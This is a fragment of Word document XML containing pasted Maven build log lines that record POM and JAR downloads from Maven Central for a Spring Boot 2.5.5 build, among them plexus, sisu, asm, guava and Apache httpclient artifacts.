    <w:p w14:paraId="22F0306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https://repo.maven.apache.org/maven2/org/antlr/antlr4-master/4.7.2/antlr4-master-4.7.2.pom (4.4 kB at 200 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737DE0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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E06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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.pom (4.3 kB at 186 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF5E45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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-loader-tools/2.5.5/spring-boot-loader-tools-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D46C4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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-loader-tools/2.5.5/spring-boot-loader-tools-2.5.5.pom (2.3 kB at 84 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE232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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.2.0/maven-common-artifact-filters-3.2.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B234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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.2.0/maven-common-artifact-filters-3.2.0.pom (6.9 kB at 302 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA57C1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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.1/maven-artifact-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096018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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.1.1/maven-artifact-3.1.1.pom (2.0 kB at 86 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C47D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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.1.1/maven-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E22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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.1.1/maven-3.1.1.pom (22 kB at 850 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5389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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.1/maven-model-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E10F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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.1.1/maven-model-3.1.1.pom (4.1 kB at 166 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1FF0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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.1/maven-core-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575BD2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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/3.1.1/maven-core-3.1.1.pom (7.3 kB at 269 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A466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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.1/maven-settings-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC50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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/3.1.1/maven-settings-3.1.1.pom (2.2 kB at 84 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98EF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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.1/maven-settings-builder-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452AB7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings-builder/3.1.1/maven-settings-builder-3.1.1.pom (2.6 kB at 74 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C914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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.19/plexus-interpolation-1.19.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472AD29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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.19/plexus-interpolation-1.19.pom (1.0 kB at 47 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DCD4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.3.1/plexus-components-1.3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D010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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.3.1/plexus-components-1.3.1.pom (3.1 kB at 139 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4327492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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552EB9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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom (815 B at 28 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C59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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496FDFB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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom (4.2 kB at 212 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E76E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.1/maven-repository-metadata-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084A6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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/3.1.1/maven-repository-metadata-3.1.1.pom (2.2 kB at 86 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5CC8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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.1.1/maven-plugin-api-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB453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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.1.1/maven-plugin-api-3.1.1.pom (3.4 kB at 113 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F144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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D077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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom (4.8 kB at 167 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D952D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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFEFA6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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom (13 kB at 600 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D889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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C31DF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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom (2.5 kB at 115 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2054A3B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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18DA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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom (14 kB at 666 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56919C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.1/maven-model-builder-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3AB9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model-builder/3.1.1/maven-model-builder-3.1.1.pom (2.8 kB at 117 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E3869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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.1/maven-aether-provider-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AFB4A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-aether-provider/3.1.1/maven-aether-provider-3.1.1.pom (4.1 kB at 178 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB294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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.1/plexus-classworlds-2.5.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A01966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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.1/plexus-classworlds-2.5.1.pom (5.0 kB at 218 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F351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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.6.3/maven-plugin-api-3.6.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697AB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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.6.3/maven-plugin-api-3.6.3.pom (3.0 kB at 101 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13938F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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.6.3/maven-3.6.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2C2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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.6.3/maven-3.6.3.pom (26 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F3E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.6.3/maven-model-3.6.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21485A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.6.3/maven-model-3.6.3.pom (4.1 kB at 186 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCCEB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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.2.1/plexus-utils-3.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237C49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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.2.1/plexus-utils-3.2.1.pom (5.3 kB at 243 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721091C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.6.3/maven-artifact-3.6.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B542E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.6.3/maven-artifact-3.6.3.pom (2.4 kB at 120 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D3859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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.4/org.eclipse.sisu.plexus-0.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B888C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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.4/org.eclipse.sisu.plexus-0.3.4.pom (4.2 kB at 208 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F645C4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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.3.4/sisu-plexus-0.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683551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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.3.4/sisu-plexus-0.3.4.pom (14 kB at 624 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6083E1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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.4/org.eclipse.sisu.inject-0.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E665B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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.4/org.eclipse.sisu.inject-0.3.4.pom (2.6 kB at 138 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DD913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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.3.4/sisu-inject-0.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A196D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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.3.4/sisu-inject-0.3.4.pom (14 kB at 655 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8FBA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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F60B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.pom (7.3 kB at 332 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20FC8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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84E6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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom (3.4 kB at 162 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B432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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189CA8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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.pom (7.9 kB at 360 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D05AF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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-shade-plugin/3.2.4/maven-shade-plugin-3.2.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C62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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-shade-plugin/3.2.4/maven-shade-plugin-3.2.4.pom (11 kB at 384 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C139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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.4/plexus-component-annotations-1.5.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB9ED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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.4/plexus-component-annotations-1.5.4.pom (815 B at 39 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D81B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.4/plexus-containers-1.5.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1296FC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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.4/plexus-containers-1.5.4.pom (4.2 kB at 141 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CA5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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.5/plexus-2.0.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741FA4D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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.5/plexus-2.0.5.pom (17 kB at 789 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D02DF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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.12.0/maven-artifact-transfer-0.12.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72493C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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.12.0/maven-artifact-transfer-0.12.0.pom (11 kB at 388 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB29D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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.0.1/maven-common-artifact-filters-3.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C20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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.0.1/maven-common-artifact-filters-3.0.1.pom (4.8 kB at 179 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74898F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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.1.0/maven-shared-utils-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E1A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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.1.0/maven-shared-utils-3.1.0.pom (5.0 kB at 207 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6195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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.1.1/plexus-utils-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6A3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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.1.1/plexus-utils-3.1.1.pom (5.1 kB at 220 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E98EC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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC81D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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.pom (2.7 kB at 103 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CC37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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.5/slf4j-parent-1.7.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B52FB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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.5/slf4j-parent-1.7.5.pom (12 kB at 513 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988415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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/8.0/asm-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F4B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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/8.0/asm-8.0.pom (2.9 kB at 105 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633A3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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-commons/8.0/asm-commons-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5602781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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-commons/8.0/asm-commons-8.0.pom (3.7 kB at 141 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C70DA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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-tree/8.0/asm-tree-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63E26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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-tree/8.0/asm-tree-8.0.pom (3.1 kB at 108 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1C4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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-analysis/8.0/asm-analysis-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB85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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-analysis/8.0/asm-analysis-8.0.pom (3.2 kB at 117 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613FA0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https://repo.maven.apache.org/maven2/org/jdom/jdom2/2.0.6/jdom2-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA81D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https://repo.maven.apache.org/maven2/org/jdom/jdom2/2.0.6/jdom2-2.0.6.pom (4.6 kB at 192 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0554D6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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.0.1/maven-dependency-tree-3.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AEFC3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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.0.1/maven-dependency-tree-3.0.1.pom (7.5 kB at 312 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F21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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B68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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.pom (748 B at 37 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63A3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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.6/plexus-containers-1.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8CF2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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.6/plexus-containers-1.6.pom (3.8 kB at 164 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931DAD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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.2/plexus-3.3.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A557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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.2/plexus-3.3.2.pom (22 kB at 861 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A262A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https://repo.maven.apache.org/maven2/org/vafer/jdependency/2.4.0/jdependency-2.4.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05322C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https://repo.maven.apache.org/maven2/org/vafer/jdependency/2.4.0/jdependency-2.4.0.pom (15 kB at 603 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F1A5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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-util/8.0/asm-util-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0156160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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-util/8.0/asm-util-8.0.pom (3.7 kB at 126 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E98D6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https://repo.maven.apache.org/maven2/com/google/guava/guava/28.2-android/guava-28.2-android.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286033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https://repo.maven.apache.org/maven2/com/google/guava/guava/28.2-android/guava-28.2-android.pom (11 kB at 475 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB07A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https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/28.2-android/guava-parent-28.2-android.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46525C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https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/28.2-android/guava-parent-28.2-android.pom (13 kB at 587 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AA25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https://repo.maven.apache.org/maven2/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5DF0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https://repo.maven.apache.org/maven2/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.pom (2.4 kB at 121 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E99FD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https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/26.0-android/guava-parent-26.0-android.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA698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https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/26.0-android/guava-parent-26.0-android.pom (10 kB at 485 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2448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https://repo.maven.apache.org/maven2/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A8F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https://repo.maven.apache.org/maven2/com/google/guava/listenablefuture/9999.0-empty-to-avoid-conflict-with-guava/listenablefuture-9999.0-empty-to-avoid-conflict-with-guava.pom (2.3 kB at 114 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623680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https://repo.maven.apache.org/maven2/org/checkerframework/checker-compat-qual/2.5.5/checker-compat-qual-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEBB9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https://repo.maven.apache.org/maven2/org/checkerframework/checker-compat-qual/2.5.5/checker-compat-qual-2.5.5.pom (2.7 kB at 106 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713108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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_annotations/2.3.4/error_prone_annotations-2.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123F4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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_annotations/2.3.4/error_prone_annotations-2.3.4.pom (2.1 kB at 96 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F3D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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_parent/2.3.4/error_prone_parent-2.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBBE5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https://repo.maven.apache.org/maven2/com/google/errorprone/error_prone_parent/2.3.4/error_prone_parent-2.3.4.pom (5.4 kB at 226 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1670D2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https://repo.maven.apache.org/maven2/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01408A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https://repo.maven.apache.org/maven2/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.pom (2.8 kB at 126 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241792C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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.7/commons-lang3-3.7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376600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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.7/commons-lang3-3.7.pom (28 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F288D4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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-buildpack-platform/2.5.5/spring-boot-buildpack-platform-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C068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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna-platform/5.7.0/jna-platform-5.7.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D865C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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna/5.7.0/jna-5.7.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C9B7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https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.20/commons-compress-1.20.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21047A7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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC2D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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-buildpack-platform/2.5.5/spring-boot-buildpack-platform-2.5.5.jar (238 kB at 2.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C2FB0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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03241DE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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.jar (329 kB at 2.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9BAD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https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5973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https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar (780 kB at 5.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C27FC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https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ACE6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https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.20/commons-compress-1.20.jar (632 kB at 4.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0875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https://repo.maven.apache.org/maven2/org/tomlj/tomlj/1.0.0/tomlj-1.0.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84AE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https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar (62 kB at 396 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3655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https://repo.maven.apache.org/maven2/org/antlr/antlr4-runtime/4.7.2/antlr4-runtime-4.7.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8335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https://repo.maven.apache.org/maven2/org/tomlj/tomlj/1.0.0/tomlj-1.0.0.jar (157 kB at 883 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73992E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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A2F21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https://repo.maven.apache.org/maven2/net/java/dev/jna/jna-platform/5.7.0/jna-platform-5.7.0.jar (1.3 MB at 6.8 MB/s)</w:t>
      </w:r>
    </w:p>
